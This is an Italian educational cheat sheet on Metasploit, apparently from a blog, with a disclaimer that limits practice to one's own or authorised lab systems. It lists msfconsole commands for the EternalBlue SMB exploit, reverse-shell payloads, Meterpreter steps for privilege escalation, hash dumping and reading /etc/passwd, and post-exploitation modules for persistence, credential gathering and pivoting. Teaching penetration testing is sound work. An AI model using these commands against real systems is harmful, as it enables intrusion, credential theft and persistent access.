⚠️ Disclaimer legale: Questo articolo è esclusivamente a scopo educativo. Tutte le tecniche descritte vanno praticate SOLO su sistemi propri o su piattaforme autorizzate (TryHackMe, HackTheBox, VulnHub). Attaccare sistemi altrui senza autorizzazione è reato penale ai sensi degli artt. 615-ter e seguenti del Codice Penale italiano.
Architettura di Metasploit
Metasploit è composto da: librerie Rex (comunicazioni), Framework Core, Framework Base, moduli (exploit, payload, auxiliary, encoder, post), msfconsole (interfaccia).
Avvio e comandi base
msfconsole
# Cerca exploit
search type:exploit platform:windows smb
# Usa un modulo
use exploit/windows/smb/ms17_010_eternalblue
# Mostra opzioni
show options
# Imposta opzioni
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
# Esegui
run (o exploit)
Payload: tipi principali
- Singles: payload completo in un singolo pacchetto (es. windows/shell_bind_tcp)
- Stagers: primo stadio leggero che scarica il secondo (es. windows/meterpreter/reverse_tcp)
- Meterpreter: shell avanzata in-memory, feature-rich
Meterpreter: comandi essenziali
sysinfo # info sistema
getuid # utente attuale
getsystem # privilege escalation automatica
hashdump # estrai hash password (SYSTEM required)
upload file.exe /tmp/ # carica file
download /etc/passwd # scarica file
shell # apri cmd/bash standard
background # metti sessione in background
sessions -l # lista sessioni attive
sessions -i 1 # riprendi sessione 1
Post-exploitation
# Persistence
use post/windows/manage/persistence_exe
# Estrai credenziali (richiede privilegi)
use post/windows/gather/credentials/credential_collector
# Pivoting: usa host compromesso come proxy
route add 10.10.10.0/24 1 # sessione 1 come gateway
💬 Commenti (0)
Nessun commento ancora. Sii il primo!